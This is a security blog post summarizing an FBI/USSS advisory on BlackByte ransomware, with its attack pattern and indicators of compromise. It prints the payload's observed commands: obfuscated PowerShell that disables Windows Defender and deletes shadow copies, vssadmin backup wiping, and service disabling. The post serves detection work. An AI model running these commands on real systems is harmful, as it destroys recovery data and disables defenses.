Skip to content
Siddhant Mishra Aug 23, 2022 2:49:07 AM 8 min read

Return of BlackByte Ransomware

On February 11, 2022, FBI and Unites States Secret Service (USSS) released a joint advisory on the BlackByte ransomware which had compromised multiple US and foreign businesses including entities in at least three critical infrastructure sectors (government facilities, financial, and food and agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems including physical and virtual servers. Check out this blog to learn more about ransomware attacks and how to avoid them.

The group behind BlackByte ransomware is believed to be from Russia since the adversaries avoided targeting companies based in Russia or СIS countries. Additionally, one of the functions/methods used in the code for encryption for BlackByte was named “Pognali,” which means “let’s go” in Russian.

Attack pattern: At a glance


  • Perimeter breach: Adversaries use vulnerable unpatched public facing applications or services such as ProxyShell for Microsoft Exchange Servers or SonicWall VPN or any other vulnerable VPN server or Phishing.
  • Installing genuine binaries or applications: Adversaries then install publicly available commercial or non-commercial software such as 'netscanold' or 'psexec' or AnyDesk software or any living-off-the-land binaries (LoLBins). These tools are also often used by administrators for legitimate tasks, so it is difficult to detect them as a malicious threat.
  • Lateral movement and privilege escalation: The above utilities or applications are then used to discover other systems and once they are done with lateral movement and make themselves persistent in the network by adding additional admin accounts.
  • Payload detonation: Using the new Admin account the ransomware wipes shadow copies via WMI objects deletes scheduled tasks on hosts and encrypts the system with ransom notes in each directory. These payloads were reported to have different wrappers to evade HASH based detection or use a dynamic offset number during the unpacking process to avoid detection. It was also reported that the initial behavior of the payload seemed like Windows Defender or any normal Windows utility which later either disabled Windows Defender or any ransomware protection services/applications before detonation.

Ransomware evolution since last year


  • Attack vectors for reconnaissance and compromise have been built to leverage and exploit the latest CVEs for public facing applications such as VPN gateways or email servers.
  • Genuine host/system utilities and applications have been used for lateral movement and privilege escalation.
  • Exploits have been crafted to leverage chained CVEs of ProxyShell for initial compromise to privilege escalation for Microsoft Exchange server.

Indicators of Compromise

The following are a few known Indicators of Compromise(IOCs) published jointly by the FBI and USSS associated to blackbyte ransomware:

Paths/Directories to monitor:
  • Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET
  • Files\root\e22c2559\92c7e946
  • inetpub\wwwroot\aspnet_client
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
  • Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current
  • Program Files\Microsoft\Exchange
  • Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes
  • Program Files\Microsoft\Exchange
  • Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts
  • Program Files\Microsoft\Exchange
  • Server\V15\FrontEnd\HttpProxy\owa\auth\Current\scripts\premium
  • %AppData%\BB.ico
  • %AppData%\BlackByteRestore.txt
  • %AppData%\dummy
  • %HOMEPATH%\complex.exe
  • Users\tree.dll

The filenames for suspicious ASPX files appeared to have the following naming conventions:

  • <5 random alphabetical characters>.aspx
  • error<2 capital letters>.aspx
  • iismeta<4 random numbers>.aspx

Persistent scheduled tasks created that should be monitored at Windows\System32\Tasks:

  • C:\Users\<username>\complex.exe -single <SHA256>
  • C:\Windows\System32\cmd.exe /c for /l %x in (1,1,75) do start
  • wordpad.exe /p C:\Users\tree.dll

Monitor scheduled tasks deleted within a short time interval for multiple hosts.

IIS logs contain GET and POST requests to various malicious ASPX files that follow a pattern of <FILE_PATH>/<SUSPICIOUS_FILENAME>.aspxexec_code=Response.Write below is a list of observed commands that were executed by the payload:

  • cmd.exe /c powershell -command "$x =
  • [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARAB'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"
  • schtasks.exe /DELETE /TN "\"Raccine Rules Updater\"" /F
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  • cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  • powershell.exe $x =
  • [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
  • sc.exe config SQLTELEMETRY start= disabled
  • sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
  • sc.exe config SQLWriter start= disabled
  • sc.exe config SstpSvc start= disabled
  • powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
  • sc.exe config MBAMService start= disabled
  • sc.exe config wuauserv start= disabled
  • sc.exe config Dnscache start= auto
  • sc.exe config fdPHost start= auto
  • sc.exe config FDResPub start= auto
  • sc.exe config SSDPSRV start= auto
  • sc.exe config upnphost start= auto
  • sc.exe config RemoteRegistry start= auto

Summary

The advisory on BlackByte is a stark reminder on how critical it is to have a proper threat detection and asset monitoring strategy in place. The time from the announcement of a new CVE to its weaponization is becoming less year on year. Organizations have no choice but to have multi-layered security monitoring and defensive controls in their environments.

Persistent adversaries like the group behind BlackByte are likely to bypass one or the other security measure, but it is much harder for them to bypass all of them. These targeted campaigns and the evolution of the TTPs is likely to continue  and it has become imperative for blue teams to continue to evolve with their detection and containment strategy as well. 

avatar

Siddhant Mishra

A cyber security enthusiast.